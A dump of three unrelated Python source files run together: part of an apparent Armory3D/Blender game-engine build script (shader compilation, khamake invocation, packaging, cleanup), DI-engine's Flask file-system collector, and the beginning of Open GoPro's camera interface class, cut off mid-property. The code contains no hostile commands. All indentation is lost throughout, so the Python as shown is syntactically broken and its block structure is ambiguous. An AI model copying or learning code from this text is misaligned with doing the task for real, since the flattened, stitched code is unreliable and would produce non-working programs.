print('OS: ' + arm.utils.get_os() + ', Target: ' + state.target + ', GAPI: ' + arm.utils.get_gapi() + ', Blender: ' + bpy.app.version_string)
# Clean compiled variants if cache is disabled
build_dir = arm.utils.get_fp_build()
if wrd.arm_cache_build == False:
if os.path.isdir(build_dir + '/debug/html5-resources'):
shutil.rmtree(build_dir + '/debug/html5-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/krom-resources'):
shutil.rmtree(build_dir + '/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/debug/krom-resources'):
shutil.rmtree(build_dir + '/debug/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/windows-resources'):
shutil.rmtree(build_dir + '/windows-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/linux-resources'):
shutil.rmtree(build_dir + '/linux-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/osx-resources'):
shutil.rmtree(build_dir + '/osx-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/compiled/Shaders'):
shutil.rmtree(build_dir + '/compiled/Shaders', onerror=remove_readonly)
raw_shaders_path = sdk_path + '/armory/Shaders/'
assets_path = sdk_path + '/armory/Assets/'
export_physics = bpy.data.worlds['Arm'].arm_physics != 'Disabled'
export_navigation = bpy.data.worlds['Arm'].arm_navigation != 'Disabled'
export_ui = bpy.data.worlds['Arm'].arm_ui != 'Disabled'
assets.reset()
# Build node trees
ArmoryExporter.import_traits = []
make_logic.build()
make_world.build()
make_renderpath.build()
# Export scene data
assets.embedded_data = sorted(list(set(assets.embedded_data)))
physics_found = False
navigation_found = False
ui_found = False
ArmoryExporter.compress_enabled = state.is_publish and wrd.arm_asset_compression
ArmoryExporter.optimize_enabled = state.is_publish and wrd.arm_optimize_data
if not os.path.exists(build_dir + '/compiled/Assets'):
os.makedirs(build_dir + '/compiled/Assets')
for scene in bpy.data.scenes:
if scene.arm_export:
ext = '.lz4' if ArmoryExporter.compress_enabled else '.arm'
asset_path = build_dir + '/compiled/Assets/' + arm.utils.safestr(scene.name) + ext
exporter.execute(bpy.context, asset_path, scene=scene)
if ArmoryExporter.export_physics:
physics_found = True
if ArmoryExporter.export_navigation:
navigation_found = True
if ArmoryExporter.export_ui:
ui_found = True
assets.add(asset_path)
if physics_found == False: # Disable physics if no rigid body is exported
export_physics = False
if navigation_found == False:
export_navigation = False
if ui_found == False:
export_ui = False
if wrd.arm_ui == 'Enabled':
export_ui = True
modules = []
if wrd.arm_audio == 'Enabled':
modules.append('audio')
if export_physics:
modules.append('physics')
if export_navigation:
modules.append('navigation')
if export_ui:
modules.append('ui')
if wrd.arm_formatlib == 'Enabled':
modules.append('format')
print('Exported modules: ' + str(modules))
defs = arm.utils.def_strings_to_array(wrd.world_defs)
cdefs = arm.utils.def_strings_to_array(wrd.compo_defs)
print('Shader flags: ' + str(defs))
if wrd.arm_debug_console:
print('Khafile flags: ' + str(assets.khafile_defs))
# Render path is configurable at runtime
has_config = wrd.arm_write_config or os.path.exists(arm.utils.get_fp() + '/Bundled/config.arm')
# Write compiled.inc
shaders_path = build_dir + '/compiled/Shaders'
if not os.path.exists(shaders_path):
os.makedirs(shaders_path)
write_data.write_compiledglsl(defs + cdefs, make_variants=has_config)
# Write referenced shader passes
if not os.path.isfile(build_dir + '/compiled/Shaders/shader_datas.arm') or state.last_world_defs != wrd.world_defs:
res = {}
res['shader_datas'] = []
for ref in assets.shader_passes:
# Ensure shader pass source exists
if not os.path.exists(raw_shaders_path + '/' + ref):
continue
assets.shader_passes_assets[ref] = []
if ref.startswith('compositor_pass'):
compile_shader_pass(res, raw_shaders_path, ref, defs + cdefs, make_variants=has_config)
else:
compile_shader_pass(res, raw_shaders_path, ref, defs, make_variants=has_config)
arm.utils.write_arm(shaders_path + '/shader_datas.arm', res)
for ref in assets.shader_passes:
for s in assets.shader_passes_assets[ref]:
assets.add_shader(shaders_path + '/' + s + '.glsl')
for file in assets.shaders_external:
name = file.split('/')[-1].split('\\')[-1]
target = build_dir + '/compiled/Shaders/' + name
if not os.path.exists(target):
shutil.copy(file, target)
state.last_world_defs = wrd.world_defs
# Reset path
os.chdir(fp)
# Copy std shaders
if not os.path.isdir(build_dir + '/compiled/Shaders/std'):
shutil.copytree(raw_shaders_path + 'std', build_dir + '/compiled/Shaders/std')
# Write config.arm
resx, resy = arm.utils.get_render_resolution(arm.utils.get_active_scene())
if wrd.arm_write_config:
write_data.write_config(resx, resy)
# Write khafile.js
enable_dce = state.is_publish and wrd.arm_dce
import_logic = not state.is_publish and arm.utils.logic_editor_space() != None
write_data.write_khafilejs(state.is_play, export_physics, export_navigation, export_ui, state.is_publish, enable_dce, ArmoryExporter.import_traits, import_logic)
# Write Main.hx - depends on write_khafilejs for writing number of assets
scene_name = arm.utils.get_project_scene_name()
write_data.write_mainhx(scene_name, resx, resy, state.is_play, state.is_publish)
if scene_name != state.last_scene or resx != state.last_resx or resy != state.last_resy:
wrd.arm_recompile = True
state.last_resx = resx
state.last_resy = resy
state.last_scene = scene_name
def compile(assets_only=False):
wrd = bpy.data.worlds['Arm']
fp = arm.utils.get_fp()
os.chdir(fp)
# Set build command
target_name = state.target
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path]
kha_target_name = arm.utils.get_kha_target(target_name)
if kha_target_name != '':
cmd.append(kha_target_name)
# Custom exporter
if state.is_export:
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
if item.arm_project_target == 'custom' and item.arm_project_khamake != '':
for s in item.arm_project_khamake.split(' '):
cmd.append(s)
ffmpeg_path = arm.utils.get_ffmpeg_path() # Path to binary
if ffmpeg_path != '':
cmd.append('--ffmpeg')
cmd.append(ffmpeg_path) # '"' + ffmpeg_path + '"'
state.export_gapi = arm.utils.get_gapi()
cmd.append('-g')
cmd.append(state.export_gapi)
if arm.utils.get_legacy_shaders() or 'ios' in state.target:
if 'html5' in state.target or 'ios' in state.target:
pass
else:
cmd.append('--shaderversion')
cmd.append('110')
elif 'android' in state.target or 'html5' in state.target:
cmd.append('--shaderversion')
cmd.append('300')
else:
cmd.append('--shaderversion')
cmd.append('330')
if '_VR' in wrd.world_defs:
cmd.append('--vr')
cmd.append('webvr')
if arm.utils.get_rp().rp_renderer == 'Raytracer':
cmd.append('--raytrace')
cmd.append('dxr')
dxc_path = fp + '/HlslShaders/dxc.exe'
subprocess.Popen([dxc_path, '-Zpr', '-Fo', fp + '/Bundled/raytrace.cso', '-T', 'lib_6_3', fp + '/HlslShaders/raytrace.hlsl']).wait()
if arm.utils.get_khamake_threads() > 1:
cmd.append('--parallelAssetConversion')
cmd.append(str(arm.utils.get_khamake_threads()))
compilation_server = False
cmd.append('--to')
if (kha_target_name == 'krom' and not state.is_publish) or (kha_target_name == 'html5' and not state.is_publish):
cmd.append(arm.utils.build_dir() + '/debug')
# Start compilation server
if kha_target_name == 'krom' and arm.utils.get_compilation_server() and not assets_only and wrd.arm_cache_build:
compilation_server = True
arm.lib.server.run_haxe(arm.utils.get_haxe_path())
else:
cmd.append(arm.utils.build_dir())
if assets_only or compilation_server:
cmd.append('--nohaxe')
cmd.append('--noproject')
print("Running: ", cmd)
print("Using project from " + arm.utils.get_fp())
state.proc_build = run_proc(cmd, assets_done if compilation_server else build_done)
def build(target, is_play=False, is_publish=False, is_export=False):
global profile_time
profile_time = time.time()
state.target = target
state.is_play = is_play
state.is_publish = is_publish
state.is_export = is_export
# Save blend
if arm.utils.get_save_on_build():
bpy.ops.wm.save_mainfile()
log.clear()
# Set camera in active scene
active_scene = arm.utils.get_active_scene()
if active_scene.camera == None:
for o in active_scene.objects:
if o.type == 'CAMERA':
active_scene.camera = o
break
# Get paths
sdk_path = arm.utils.get_sdk_path()
raw_shaders_path = sdk_path + '/armory/Shaders/'
# Set dir
fp = arm.utils.get_fp()
os.chdir(fp)
# Create directories
wrd = bpy.data.worlds['Arm']
sources_path = 'Sources/' + arm.utils.safestr(wrd.arm_project_package)
if not os.path.exists(sources_path):
os.makedirs(sources_path)
# Save external scripts edited inside Blender
write_texts = False
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty:
write_texts = True
break
if write_texts:
area = bpy.context.area
old_type = area.type
area.type = 'TEXT_EDITOR'
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty and os.path.isfile(text.filepath):
area.spaces[0].text = text
bpy.ops.text.save()
area.type = old_type
# Save internal Haxe scripts
for text in bpy.data.texts:
if text.filepath == '' and text.name[-3:] == '.hx':
with open('Sources/' + arm.utils.safestr(wrd.arm_project_package) + '/' + text.name, 'w') as f:
f.write(text.as_string())
# Export data
export_data(fp, sdk_path)
if state.target == 'html5':
w, h = arm.utils.get_render_resolution(arm.utils.get_active_scene())
write_data.write_indexhtml(w, h, is_publish)
# Bundle files from include dir
if os.path.isdir('include'):
dest = '/html5/' if is_publish else '/debug/html5/'
for fn in glob.iglob(os.path.join('include', '**'), recursive=False):
shutil.copy(fn, arm.utils.build_dir() + dest + os.path.basename(fn))
def play_done():
state.proc_play = None
state.redraw_ui = True
log.clear()
def assets_done():
if state.proc_build == None:
return
result = state.proc_build.poll()
if result == 0:
# Connect to the compilation server
os.chdir(arm.utils.build_dir() + '/debug/')
cmd = [arm.utils.get_haxe_path(), '--connect', '6000', 'project-krom.hxml']
state.proc_build = run_proc(cmd, compilation_server_done)
else:
state.proc_build = None
state.redraw_ui = True
log.print_info('Build failed, check console')
def compilation_server_done():
if state.proc_build == None:
return
result = state.proc_build.poll()
if result == 0:
if os.path.exists('krom/krom.js'):
os.chmod('krom/krom.js', stat.S_IWRITE)
os.remove('krom/krom.js')
os.rename('krom/krom.js.temp', 'krom/krom.js')
build_done()
else:
state.proc_build = None
state.redraw_ui = True
log.print_info('Build failed, check console')
def build_done():
print('Finished in ' + str(time.time() - profile_time))
if state.proc_build == None:
return
result = state.proc_build.poll()
state.proc_build = None
state.redraw_ui = True
if result == 0:
bpy.data.worlds['Arm'].arm_recompile = False
build_success()
else:
log.print_info('Build failed, check console')
def patch():
if state.proc_build != None:
return
assets.invalidate_enabled = False
fp = arm.utils.get_fp()
os.chdir(fp)
asset_path = arm.utils.get_fp_build() + '/compiled/Assets/' + arm.utils.safestr(bpy.context.scene.name) + '.arm'
exporter.execute(bpy.context, asset_path, scene=bpy.context.scene)
if not os.path.isdir(arm.utils.build_dir() + '/compiled/Shaders/std'):
raw_shaders_path = arm.utils.get_sdk_path() + '/armory/Shaders/'
shutil.copytree(raw_shaders_path + 'std', arm.utils.build_dir() + '/compiled/Shaders/std')
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path, 'krom']
cmd.append('--shaderversion')
cmd.append('330')
cmd.append('--parallelAssetConversion')
cmd.append('4')
cmd.append('--to')
cmd.append(arm.utils.build_dir() + '/debug')
cmd.append('--nohaxe')
cmd.append('--noproject')
assets.invalidate_enabled = True
state.proc_build = run_proc(cmd, patch_done)
def patch_done():
js = 'iron.Scene.patch();'
write_patch(js)
state.proc_build = None
patch_id = 0
def write_patch(js):
global patch_id
with open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w') as f:
patch_id += 1
f.write(str(patch_id) + '\n')
f.write(js)
def runtime_to_target():
wrd = bpy.data.worlds['Arm']
if wrd.arm_runtime == 'Krom':
return 'krom'
else:
return 'html5'
def get_khajs_path(target):
if target == 'krom':
return arm.utils.build_dir() + '/debug/krom/krom.js'
else: # Browser
return arm.utils.build_dir() + '/debug/html5/kha.js'
def play():
global scripts_mtime
wrd = bpy.data.worlds['Arm']
log.clear()
build(target=runtime_to_target(), is_play=True)
khajs_path = get_khajs_path(state.target)
if not wrd.arm_cache_build or \
not os.path.isfile(khajs_path) or \
assets.khafile_defs_last != assets.khafile_defs or \
state.last_target != state.target:
wrd.arm_recompile = True
state.last_target = state.target
# Trait sources modified
state.mod_scripts = []
script_path = arm.utils.get_fp() + '/Sources/' + arm.utils.safestr(wrd.arm_project_package)
if os.path.isdir(script_path):
new_mtime = scripts_mtime
for fn in glob.iglob(os.path.join(script_path, '**', '*.hx'), recursive=True):
mtime = os.path.getmtime(fn)
if scripts_mtime < mtime:
arm.utils.fetch_script_props(fn) # Trait props
fn = fn.split('Sources/')[1]
fn = fn[:-3] #.hx
fn = fn.replace('/', '.')
state.mod_scripts.append(fn)
wrd.arm_recompile = True
if new_mtime < mtime:
new_mtime = mtime
scripts_mtime = new_mtime
if len(state.mod_scripts) > 0: # Trait props
arm.utils.fetch_trait_props()
compile(assets_only=(not wrd.arm_recompile))
def build_success():
log.clear()
wrd = bpy.data.worlds['Arm']
if state.is_play:
if wrd.arm_runtime == 'Browser':
# Start server
os.chdir(arm.utils.get_fp())
t = threading.Thread(name='localserver', target=arm.lib.server.run_tcp)
t.daemon = True
t.start()
html5_app_path = 'http://localhost:8040/' + arm.utils.build_dir() + '/debug/html5'
webbrowser.open(html5_app_path)
elif wrd.arm_runtime == 'Krom':
if wrd.arm_live_patch:
open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w').close()
if arm.utils.get_os() == 'win':
bin_ext = '' if state.export_gapi == 'direct3d11' else '_' + state.export_gapi
else:
bin_ext = '' if state.export_gapi == 'opengl' else '_' + state.export_gapi
krom_location, krom_path = arm.utils.krom_paths(bin_ext=bin_ext)
os.chdir(krom_location)
cmd = [krom_path, arm.utils.get_fp_build() + '/debug/krom', arm.utils.get_fp_build() + '/debug/krom-resources']
if arm.utils.get_os() == 'win':
cmd.append('--consolepid')
cmd.append(str(os.getpid()))
if wrd.arm_audio == 'Enabled':
cmd.append('--sound')
state.proc_play = run_proc(cmd, play_done)
elif state.is_publish:
sdk_path = arm.utils.get_sdk_path()
target_name = arm.utils.get_kha_target(state.target)
files_path = arm.utils.get_fp_build() + '/' + target_name
if (target_name == 'html5' or target_name == 'krom') and wrd.arm_minify_js:
# Minify JS
minifier_path = sdk_path + '/lib/armory_tools/uglifyjs/bin/uglifyjs'
if target_name == 'html5':
jsfile = files_path + '/kha.js'
else:
jsfile = files_path + '/krom.js'
args = [arm.utils.get_node_path(), minifier_path, jsfile, '-o', jsfile]
proc = subprocess.Popen(args)
proc.wait()
if target_name == 'krom':
# Copy Krom binaries
if state.target == 'krom-windows':
gapi = state.export_gapi
ext = '' if gapi == 'direct3d11' else '_' + gapi
krom_location = sdk_path + '/Krom/Krom' + ext + '.exe'
shutil.copy(krom_location, files_path + '/Krom.exe')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.exe'
os.rename(files_path + '/Krom.exe', files_path + '/' + krom_exe)
elif state.target == 'krom-linux':
krom_location = sdk_path + '/Krom/Krom'
shutil.copy(krom_location, files_path)
krom_exe = arm.utils.safestr(wrd.arm_project_name)
os.rename(files_path + '/Krom', files_path + '/' + krom_exe)
krom_exe = './' + krom_exe
else:
krom_location = sdk_path + '/Krom/Krom.app'
shutil.copytree(krom_location, files_path + '/Krom.app')
game_files = os.listdir(files_path)
for f in game_files:
f = files_path + '/' + f
if os.path.isfile(f):
shutil.move(f, files_path + '/Krom.app/Contents/MacOS')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.app'
os.rename(files_path + '/Krom.app', files_path + '/' + krom_exe)
# Serialize krom.js into krom.bin
if wrd.arm_minify_js:
cwd = os.getcwd()
fp = files_path
if state.target == 'krom-macos':
fp += '/' + krom_exe + '/Contents/MacOS'
krom_exe = './Krom'
os.chdir(fp)
args = [krom_exe, '.', '.', '--writebin']
proc = subprocess.Popen(args)
proc.wait()
os.chdir(cwd)
os.remove(fp + '/krom.js')
# Rename
ext = state.target.split('-')[-1] # krom-windows
new_files_path = files_path + '-' + ext
os.rename(files_path, new_files_path)
files_path = new_files_path
if target_name == 'html5':
print('Exported HTML5 package to ' + files_path)
elif target_name.startswith('ios') or target_name.startswith('osx'): # TODO: to macos
print('Exported XCode project to ' + files_path + '-build')
elif target_name.startswith('windows'):
print('Exported Visual Studio 2017 project to ' + files_path + '-build')
elif target_name.startswith('android-native'):
print('Exported Android Studio project to ' + files_path + '-build/' + arm.utils.safestr(wrd.arm_project_name))
elif target_name.startswith('krom'):
print('Exported Krom package to ' + files_path)
else:
print('Exported makefiles to ' + files_path + '-build')
def clean():
os.chdir(arm.utils.get_fp())
wrd = bpy.data.worlds['Arm']
# Remove build and compiled data
try:
if os.path.isdir(arm.utils.build_dir()):
shutil.rmtree(arm.utils.build_dir(), onerror=remove_readonly)
if os.path.isdir(arm.utils.get_fp() + '/build'): # Kode Studio build dir
shutil.rmtree(arm.utils.get_fp() + '/build', onerror=remove_readonly)
except:
print('Armory Warning: Some files in the build folder are locked')
# Remove compiled nodes
pkg_dir = arm.utils.safestr(wrd.arm_project_package).replace('.', '/')
nodes_path = 'Sources/' + pkg_dir + '/node/'
if os.path.isdir(nodes_path):
shutil.rmtree(nodes_path, onerror=remove_readonly)
# Remove khafile/korefile/Main.hx
if os.path.isfile('khafile.js'):
os.remove('khafile.js')
if os.path.isfile('korefile.js'):
os.remove('korefile.js')
if os.path.isfile('Sources/Main.hx'):
os.remove('Sources/Main.hx')
# Remove Sources/ dir if empty
if os.path.exists('Sources/' + pkg_dir) and os.listdir('Sources/' + pkg_dir) == []:
shutil.rmtree('Sources/' + pkg_dir, onerror=remove_readonly)
if os.path.exists('Sources') and os.listdir('Sources') == []:
shutil.rmtree('Sources/', onerror=remove_readonly)
# To recache signatures for batched materials
for mat in bpy.data.materials:
mat.signature = ''
mat.arm_cached = False
# Restart compilation server
if arm.utils.get_compilation_server():
arm.lib.server.kill_haxe()
print('Project cleaned')
|
flask_fs_collector.py | import os
import time
from typing import Union, Dict, Callable
from queue import Queue
from threading import Thread
from ding.utils import read_file, save_file, COMM_COLLECTOR_REGISTRY
from ding.utils.file_helper import save_to_di_store
from ding.interaction import Slave, TaskFail
from .base_comm_collector import BaseCommCollector
class CollectorSlave(Slave):
"""
Overview:
A slave, whose master is coordinator.
Used to pass message between comm collector and coordinator.
Interfaces:
__init__, _process_task
"""
# override
def __init__(self, *args, callback_fn: Dict[str, Callable], **kwargs) -> None:
"""
Overview:
Init callback functions additionally. Callback functions are methods in comm collector.
"""
super().__init__(*args, **kwargs)
self._callback_fn = callback_fn
self._current_task_info = None
def _process_task(self, task: dict) -> Union[dict, TaskFail]:
"""
Overview:
Process a task according to input task info dict, which is passed in by master coordinator.
For each type of task, you can refer to corresponding callback function in comm collector for details.
Arguments:
- cfg (:obj:`EasyDict`): Task dict. Must contain key "name".
Returns:
- result (:obj:`Union[dict, TaskFail]`): Task result dict, or task fail exception.
"""
task_name = task['name']
if task_name == 'resource':
return self._callback_fn['deal_with_resource']()
elif task_name == 'collector_start_task':
self._current_task_info = task['task_info']
self._callback_fn['deal_with_collector_start'](self._current_task_info)
return {'message': 'collector task has started'}
elif task_name == 'collector_data_task':
data = self._callback_fn['deal_with_collector_data']()
data['buffer_id'] = self._current_task_info['buffer_id']
data['task_id'] = self._current_task_info['task_id']
return data
elif task_name == 'collector_close_task':
data = self._callback_fn['deal_with_collector_close']()
data['task_id'] = self._current_task_info['task_id']
return data
else:
raise TaskFail(
result={'message': 'task name error'}, message='illegal collector task <{}>'.format(task_name)
)
@COMM_COLLECTOR_REGISTRY.register('flask_fs')
class FlaskFileSystemCollector(BaseCommCollector):
"""
Overview:
An implementation of CommLearner, using flask and the file system.
Interfaces:
__init__, deal_with_resource, deal_with_collector_start, deal_with_collector_data, deal_with_collector_close,\
get_policy_update_info, send_stepdata, send_metadata, start, close
"""
# override
def __init__(self, cfg: dict) -> None:
"""
Overview:
Initialization method.
Arguments:
- cfg (:obj:`EasyDict`): Config dict
"""
BaseCommCollector.__init__(self, cfg)
host, port = cfg.host, cfg.port
self._callback_fn = {
'deal_with_resource': self.deal_with_resource,
'deal_with_collector_start': self.deal_with_collector_start,
'deal_with_collector_data': self.deal_with_collector_data,
'deal_with_collector_close': self.deal_with_collector_close,
}
self._slave = CollectorSlave(host, port, callback_fn=self._callback_fn)
self._path_policy = cfg.path_policy
self._path_data = cfg.path_data
if not os.path.exists(self._path_data):
try:
os.mkdir(self._path_data)
except Exception as e:
pass
self._metadata_queue = Queue(8)
self._collector_close_flag = False
self._collector = None
def deal_with_resource(self) -> dict:
"""
Overview:
Callback function in ``CollectorSlave``. Return how many resources are needed to start current collector.
Returns:
- resource (:obj:`dict`): Resource info dict, including ['gpu', 'cpu'].
"""
return {'gpu': 1, 'cpu': 20}
def deal_with_collector_start(self, task_info: dict) -> None:
"""
Overview:
Callback function in ``CollectorSlave``.
Create a collector and start a collector thread of the created one.
Arguments:
- task_info (:obj:`dict`): Task info dict.
Note:
In ``_create_collector`` method in base class ``BaseCommCollector``, 4 methods
'send_metadata', 'send_stepdata', 'get_policy_update_info', and policy are set.
You can refer to it for details.
"""
self._collector_close_flag = False
self._collector = self._create_collector(task_info)
self._collector_thread = Thread(target=self._collector.start, args=(), daemon=True, name='collector_start')
self._collector_thread.start()
def deal_with_collector_data(self) -> dict:
"""
Overview:
Callback function in ``CollectorSlave``. Get data sample dict from ``_metadata_queue``,
which will be sent to coordinator afterwards.
Returns:
- data (:obj:`Any`): Data sample dict.
"""
while True:
if not self._metadata_queue.empty():
data = self._metadata_queue.get()
break
else:
time.sleep(0.1)
return data
def deal_with_collector_close(self) -> dict:
self._collector_close_flag = True
finish_info = self._collector.get_finish_info()
self._collector.close()
self._collector_thread.join()
del self._collector_thread
self._collector = None
return finish_info
# override
def get_policy_update_info(self, path: str) -> dict:
"""
Overview:
Get policy information in corresponding path.
Arguments:
- path (:obj:`str`): path to policy update information.
"""
if self._collector_close_flag:
return
path = os.path.join(self._path_policy, path)
return read_file(path, use_lock=True)
# override
def send_stepdata(self, path: str, stepdata: list) -> None:
"""
Overview:
Save collector's step data in corresponding path.
Arguments:
- path (:obj:`str`): Path to save data.
- stepdata (:obj:`Any`): Data of one step.
"""
if save_to_di_store:
if self._collector_close_flag:
return b'0' * 20 # return an object reference that doesn't exist
object_ref = save_to_di_store(stepdata)
# print('send_stepdata:', path, 'object ref:', object_ref, 'len:', len(stepdata))
return object_ref
if self._collector_close_flag:
return
name = os.path.join(self._path_data, path)
save_file(name, stepdata, use_lock=False)
# override
def send_metadata(self, metadata: dict) -> None:
"""
Overview:
Store learn info dict in queue, which will be retrieved by callback function "deal_with_collector_learn"
in collector slave, then will be sent to coordinator.
Arguments:
- metadata (:obj:`Any`): meta data.
"""
if self._collector_close_flag:
return
necessary_metadata_keys = set(['data_id', 'policy_iter'])
necessary_info_keys = set(['collector_done', 'cur_episode', 'cur_sample', 'cur_step'])
assert necessary_metadata_keys.issubset(set(metadata.keys())
) or necessary_info_keys.issubset(set(metadata.keys()))
while True:
if not self._metadata_queue.full():
self._metadata_queue.put(metadata)
break
else:
time.sleep(0.1)
def start(self) -> None:
"""
Overview:
Start comm collector itself and the collector slave.
"""
BaseCommCollector.start(self)
self._slave.start()
def close(self) -> None:
"""
Overview:
Close comm collector itself and the collector slave.
"""
if self._end_flag:
return
while self._collector is not None:
self._collector.info("please first close collector")
time.sleep(1)
self._slave.close()
BaseCommCollector.close(self)
def __del__(self) -> None:
self.close()
|
gopro.py | # gopro.py/Open GoPro, Version 2.0 (C) Copyright 2021 GoPro, Inc. (http://gopro.com/OpenGoPro).
# This copyright was auto-generated on Wed, Sep 1, 2021 5:05:47 PM
"""Implements top level interface to GoPro module."""
from __future__ import annotations
import time
import enum
import queue
import logging
import threading
from queue import Queue
from pathlib import Path
from typing import Any, Dict, Final, Optional, Type, Callable, Union, Generic, Pattern
import wrapt
import requests
from open_gopro.exceptions import (
GoProNotInitialized,
InvalidOpenGoProVersion,
ResponseTimeout,
InvalidConfiguration,
ConnectionTerminated,
)
from open_gopro.ble import BLEController, BleUUID, BleDevice
from open_gopro.ble.adapters import BleakWrapperController
from open_gopro.wifi import WifiController
from open_gopro.wifi.adapters import Wireless
from open_gopro.util import SnapshotQueue, build_log_rx_str
from open_gopro.responses import GoProResp
from open_gopro.constants import CmdId, GoProUUIDs, StatusId, QueryCmdId, ProducerType
from open_gopro.api import Api, BleCommands, BleSettings, BleStatuses, WifiCommands, WifiSettings, Params
from open_gopro.communication_client import GoProBle, GoProWifi
logger = logging.getLogger(__name__)
KEEP_ALIVE_INTERVAL: Final = 60
WRITE_TIMEOUT: Final = 5
GET_TIMEOUT: Final = 5
HTTP_GET_RETRIES: Final = 5
class Interface(enum.Enum):
"""Enum to identify wireless interface"""
WIFI = enum.auto()
BLE = enum.auto()
def ensure_initialized(interface: Interface) -> Callable:
"""Raise exception if relevant interface is not currently initialized
Args:
interface (Interface): wireless interface to verify
Raises:
GoProNotInitialized: Wireless interface is not connected
Returns:
Callable: Direct pass-through of callable after verification
"""
@wrapt.decorator
def wrapper( # pylint: disable=missing-return-doc
wrapped: Callable, instance: GoPro, args: Any, kwargs: Any
) -> Any:
if interface is Interface.BLE and not instance.is_ble_connected:
raise GoProNotInitialized("BLE not connected")
if interface is Interface.WIFI and not instance.is_wifi_connected:
raise GoProNotInitialized("Wifi not connected")
return wrapped(*args, **kwargs)
return wrapper
@wrapt.decorator
def acquire_ready_semaphore(wrapped: Callable, instance: GoPro, args: Any, kwargs: Any) -> Any:
"""Call method after acquiring ready semaphore.
Release semaphore when done
Args:
wrapped (Callable): method to call
instance (GoPro): instance that owns the method
args (Any): positional arguments
kwargs (Any): keyword arguments
Returns:
Any: result of method
"""
if instance._maintain_ble:
logger.trace(f"{wrapped.__name__} acquiring semaphore") # type: ignore
with instance._ready:
logger.trace(f"{wrapped.__name__} has the semaphore") # type: ignore
ret = wrapped(*args, **kwargs)
else:
ret = wrapped(*args, **kwargs)
if instance._maintain_ble:
logger.trace(f"{wrapped.__name__} released the semaphore") # type: ignore
return ret
class GoPro(GoProBle, GoProWifi, Generic[BleDevice]):
"""The top-level BLE and Wifi interface to a GoPro device.
See `Open GoPro <https://gopro.github.io/OpenGoPro/python_sdk>`_ for complete documentation.
This will handle for BLE:
- discovering device
- establishing connections
- discovering GATT characteristics
- enabling notifications
- discovering Open GoPro version
- transferring data
This will handle for Wifi:
- finding SSID and password
- establishing Wifi connection
- transferring data
It will also do some synchronization, etc:
- ensuring camera is ready / not encoding before transferring data
- sending keep alive signal periodically
If no target arg is passed in, the first discovered GoPro device will be connected to.
It can be used via context manager:
>>> with GoPro() as gopro:
>>> gopro.ble_command.set_shutter(Params.Shutter.ON)
Or without:
>>> gopro = GoPro()
>>> gopro.open()
>>> gopro.ble_command.set_shutter(Params.Shutter.ON)
>>> gopro.close()
Args:
target (Optional[Union[Pattern, BleDevice]], optional): Last 4 of camera name / serial number
(i.e. 0456 for GoPro0456). Defaults to None (i.e. connect to first discovered GoPro)
ble_adapter (Type[BLEController], optional): Class used to control computer's BLE connection / send data.
Defaults to BleakController().
wifi_adapter (Type[WifiController], optional): Class used to control computer's Wifi connection / send data.
Defaults to Wireless().
wifi_interace (str, optional): Set to specify the wifi interface the local machine will use to connect
to the GoPro. If None (or not set), first discovered interface will be used.
enable_wifi (bool, optional): Optionally do not enable Wifi if set to False. Defaults to True.
maintain_ble (bool, optional): Optionally do not perform BLE housekeeping if set to False (used for
testing). Defaults to True.
"""
_base_url = "http://10.5.5.9:8080/" #: Hard-coded Open GoPro base URL
class _InternalState(enum.IntFlag):
"""State used to manage whether the GoPro instance is ready or not."""
READY = 0
ENCODING = 1 << 0
SYSTEM_BUSY = 1 << 1
def __init__(
self,
target: Optional[Union[Pattern, BleDevice]] = None,
ble_adapter: Type[BLEController] = BleakWrapperController,
wifi_adapter: Type[WifiController] = Wireless,
wifi_interface: Optional[str] = None,
enable_wifi: bool = True,
maintain_ble: bool = True,
) -> None:
# Store initialization information
self._enable_wifi_during_init = enable_wifi
self._maintain_ble = maintain_ble
self.id = target
# Initialize GoPro Communication Client
GoProBle.__init__(self, ble_adapter(), self._disconnect_handler, self._notification_handler, target)
GoProWifi.__init__(self, wifi_adapter(wifi_interface))
# We currently only support version 2.0
self._api = Api(self, self)
# Current accumulating synchronous responses, indexed by GoProUUIDs. This assumes there can only be one active response per BleUUID
self._active_resp: Dict[BleUUID, GoProResp] = {}
# Responses that we are waiting for.
self._sync_resp_wait_q: SnapshotQueue = SnapshotQueue()
# Synchronous response that has been parsed and are ready for their sender to receive as the response.
self._sync_resp_ready_q: SnapshotQueue = SnapshotQueue()
# For outputting asynchronously received information
self._out_q: "Queue[GoProResp]" = Queue()
self._listeners: Dict[ProducerType, bool] = {}
# Set up events
self._ble_disconnect_event = threading.Event()
self._ble_disconnect_event.set()
# Set up threads
self._threads_waiting = 0
# If we are to perform BLE housekeeping
if self._maintain_ble:
self._threads_waiting += 2
# Set up thread to send keep alive
self._keep_alive_thread = threading.Thread(
target=self._periodic_keep_alive, name="keep_alive", daemon=True
)
# Set up thread to block until camera is ready to receive commands
self._ready = threading.BoundedSemaphore(value=1)
self._state_condition = threading.Condition()
self._internal_state = GoPro._InternalState.ENCODING | GoPro._InternalState.SYSTEM_BUSY
self._state_thread = threading.Thread(target=self._maintain_state, name="state", daemon=True)
def __enter__(self) -> "GoPro": # pylint: disable=missing-return-doc
self.open()
return self
def __exit__(self, *_: Any) -> None:
self.close()
def __del__(self) -> None:
self.close()
@property
def identifier(self) -> Optional[str]:
"""Get a unique identifier for this instance.
The identifier is the last 4 digits of the camera. That is, the same string that is used to
scan for the camera for BLE.
If no target has been provided and a camera is not yet found, this will be None
Returns:
Optional[str]: last 4 digits if available, else None
"""
return self._ble.identifier
@property
def is_ble_connected(self) -> bool:
"""Are we connected via BLE to the GoPro device?
Returns:
bool: True if yes, False if no
"""
return self._ble.is_connected
@property
def is_wifi_connected(self) -> bool:
"""Are we connected via Wifi to the GoPro device?
Returns:
bool: True if yes, False if no
"""
